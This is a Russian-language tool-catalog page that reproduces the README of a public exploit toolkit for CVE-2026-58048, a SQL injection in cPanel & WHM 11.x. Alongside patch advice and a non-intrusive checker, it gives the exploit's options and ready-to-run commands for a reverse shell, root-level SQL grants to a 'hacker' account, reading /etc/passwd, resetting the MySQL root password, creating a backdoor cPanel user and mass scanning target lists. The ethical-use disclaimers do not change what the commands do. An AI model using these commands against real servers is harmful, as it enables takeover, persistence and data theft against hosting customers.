Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – Инструментарий для выполнения SQL-запросов с правами root в cPanel (CVSS 9.4) | Полный набор инструментов Red/Blue Team для непропатченных cPanel & WHM 11.x. 2 инструмента: Safe Checker (аудит/отчётность), Weaponized (reverse shell, персистентность, UDF RCE, развёртывание, чтение/запись файлов, операции с базой данных, массовое сканирование). С Python. 🦾 Используйте этично, соблюдайте закон <3 | Kitploit
Инструменты/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
РазведкаСканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияТестирование на ПроникновениеRed TeamingРеагирование на Инциденты

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Безопасность Баз Данных
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

Репозиторий
5251 месяц назадЕщё не проверено

Описание

👾 CVE-2026-58048 – Инструментарий для выполнения SQL-запросов с правами root в cPanel (CVSS 9.4) | Полный набор инструментов Red/Blue Team для непропатченных cPanel & WHM 11.x. 2 инструмента: Safe Checker (аудит/отчётность), Weaponized (reverse shell, персистентность, UDF RCE, развёртывание, чтение/запись файлов, операции с базой данных, массовое сканирование). С Python. 🦾 Используйте этично, соблюдайте закон <3

Поделиться

CVEPoC

💥 CVE‑2026‑58048 – Инструментарий для выполнения SQL-запросов с правами root в cPanel

Python 3.8+ CVSS Author cPanel

⚠️ ТОЛЬКО ЭТИЧНОЕ ИСПОЛЬЗОВАНИЕ – АВТОРИЗОВАННОЕ ТЕСТИРОВАНИЕ БЕЗОПАСНОСТИ
Этот репозиторий предоставляет инструменты исключительно для авторизованных специалистов по безопасности, blue teams и пентестеров.
Несанкционированный доступ к компьютерным системам является незаконным в соответствии с CFAA (США), Computer Misuse Act (Великобритания), TCK 243/244 (Турция) и аналогичными законами по всему миру.


📖 Обзор уязвимости

CVE‑2026‑58048 — критическая уязвимость SQL-инъекции в cPanel & WHM версий 11.x, позволяющая аутентифицированному пользователю cPanel выполнять произвольные SQL-команды с привилегиями root MySQL через функцию переименования базы данных.

Как это работает

  1. Требуется аутентифицированный доступ – злоумышленник должен иметь действующую учётную запись cPanel (имя пользователя/пароль) на целевом сервере.
  2. Манипуляция режимом SQL – эксплойт переводит сессию MySQL в режим ANSI_QUOTES, что изменяет поведение парсинга.
  3. Инъекция при переименовании базы данных – при переименовании базы данных новое имя не проходит должную санитизацию, что позволяет злоумышленнику внедрять произвольные SQL-выражения.
  4. Привилегии root – поскольку операция переименования выполняется с привилегиями root MySQL, внедрённый SQL выполняется с наивысшими правами доступа к базе данных.
  5. Воздействие – полный захват базы данных, повышение привилегий, компрометация сервера, кража данных, бэкдоры и боковое перемещение. Немедленно обновитесь!

Уязвимые версии

  • cPanel & WHM 11.110 и более ранние – уязвимы
  • 11.111 – 11.118 – уязвимы
  • 11.119 – 11.126 – уязвимы
  • 11.127 – 11.134 – уязвимы
  • 11.135 – 11.136 – уязвимы
  • 11.137.x – уязвимы ниже 11.137.1.6
  • 11.138.1.6 и более поздние – исправлены

Патч

  • Обновитесь до cPanel & WHM 11.138.1.6 или новее.
  • Если обновление невозможно, отключите операции переименования MySQL для пользователей cPanel в качестве временного обходного решения.

🧰 Инструменты

ИнструментНазначениеЦелевой пользователь
exploit.pyПолный боевой инструментарий с обратной оболочкой, персистентностью, UDF RCE, чтением/записью файлов, операциями с базами данных, поддержкой прокси и массовым сканированием.

📊 Сравнение возможностей


🎯 Сводка по сценариям использования


⚙️ Установка

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 Параметры

Параметры exploit.py

Параметры safecheck.py


💥 Сценарии


🧪 Использование эндпоинтов и API

Эксплойт использует следующие эндпоинты cPanel UAPI:


🛡️ Ответственное использование

  • Используйте эти инструменты только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение.
  • Несанкционированный доступ является незаконным и неэтичным.
  • Авторы не несут ответственности за любое неправомерное использование.
  • Всегда соблюдайте законы и нормативные акты вашей страны.

Это программное обеспечение предоставляется исключительно в образовательных целях и для авторизованного тестирования безопасности.

Скачать инструмент
Red teams / авторизованные пентестеры
safecheck.pyНеинтрузивный чекер уязвимости, который определяет версию cPanel и оценивает риск без выполнения каких-либо вредоносных полезных нагрузок. Генерирует подробные отчёты.Blue teams / аудиторы безопасности
Возможностьexploit.pysafecheck.py
Обнаружение уязвимости✅✅
Определение версии✅✅
SQL-инъекция с правами root MySQL✅❌
Обратная оболочка✅❌
Персистентность (создание пользователя cPanel)✅❌
UDF RCE (выполнение команд)✅❌
Чтение/запись файлов✅❌
Операции с базами данных (любой SQL)✅❌
Поддержка прокси✅✅
Массовое сканирование (многопоточное)✅❌
Интерактивная оболочка✅❌
Неинтрузивный (безопасный) режим❌✅
Подробный/отладочный режим✅✅
Управление проверкой SSL✅✅
Пользовательский User‑Agent✅✅
Задержка запросов / повторы✅❌
Вывод в JSON / отчёт✅✅
Проверка доступности эндпоинта❌✅
Обнаружение утечки режима SQL❌✅
СценарийРекомендуемый инструмент
Blue Team – проверка уязвимости вашей установки cPanelsafecheck.py
Аудит безопасности – неинтрузивная оценка уязвимостиsafecheck.py
Red Team – авторизованное тестирование на проникновение с полной эксплуатациейexploit.py
Bug Bounty – ответственное раскрытиеsafecheck.py
Массовое сканирование – проверка нескольких целей на уязвимостьexploit.py (только обнаружение)
Реагирование на инциденты – проверка компрометации системsafecheck.py
ПараметрОписание
-t, --targetURL целевого cPanel (например, https://cpanel.example.com:2083)
-l, --target-fileФайл со списком целей (по одной в строке) для массового сканирования
-u, --mysql-userИмя пользователя cPanel/MySQL
-P, --mysql-passПароль cPanel/MySQL
--mysql-portПорт MySQL (по умолчанию: 3306)
-p, --portПереопределить порт cPanel (по умолчанию из URL или 2083)
--threadsКоличество потоков для нескольких целей (по умолчанию: 10)
-o, --outputСохранить результаты в файл (одна цель)
--logФайл журнала для подробного вывода
-v, --verboseПодробный вывод
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
-ua, --user-agentПользовательский User‑Agent
--no-keep-aliveНе поддерживать сессию активной
--delayЗадержка между запросами (по умолчанию: 2.0с)
--max-retriesМаксимум повторов (по умолчанию: 3)
--ssl-verifyПроверять SSL-сертификаты
--cmdКоманда для выполнения (префикс sql: или udf: для конкретного типа)
--injectПользовательский SQL для инъекции (переопределяет другие действия)
--reverse-shellIP:PORT обратной оболочки (использует UDF)
--passwdИзменить пароль root MySQL
--adduserСоздать пользователя cPanel (USER DOMAIN PASSWORD)
--readПрочитать файл через LOAD_FILE
-i, --interactiveИнтерактивная оболочка после эксплуатации
--verifyПроверить успешность эксплуатации попыткой входа в MySQL
--pingПинговать цель перед эксплуатацией
ПараметрОписание
-t, --targetURL целевого cPanel (например, https://cpanel.example.com:2083)
-v, --verboseПодробный вывод
--proxyHTTP/HTTPS прокси (например, http://127.0.0.1:8080)
-ua, --user-agentПользовательский User‑Agent
--ssl-verifyПроверять SSL-сертификаты
--timeoutТаймаут запроса в секундах (по умолчанию: 10)
--logСохранить отчёт в файл
--jsonВывод результатов в формате JSON
#СценарийКоманда
1Быстрая проверка уязвимостиpython safecheck.py -t https://cpanel.example.com:2083
2Детальное сканирование с отчётомpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3Обратная оболочкаpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4Выполнить пользовательский SQL (root)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5Прочитать конфиденциальный файлpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6Изменить пароль root MySQLpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7Создать нового пользователя cPanel (персистентность)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8Интерактивная оболочка после эксплуатацииpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9Массовое сканирование из файлаpython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10Использование прокси и пользовательского User‑Agentpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"
ЭндпоинтНазначение
/execute/Mysql/create_databaseСоздать временную базу данных
/execute/Mysql/delete_databaseОчистить созданные базы данных
/execute/Mysql/rename_databaseУязвимый эндпоинт – вызывает SQL-инъекцию
/execute/Version/get_versionПроверка аутентификации и версии
/execute/UserManager/create_userСоздать нового пользователя cPanel (персистентность)
/execute/UserManager/list_usersСписок существующих пользователей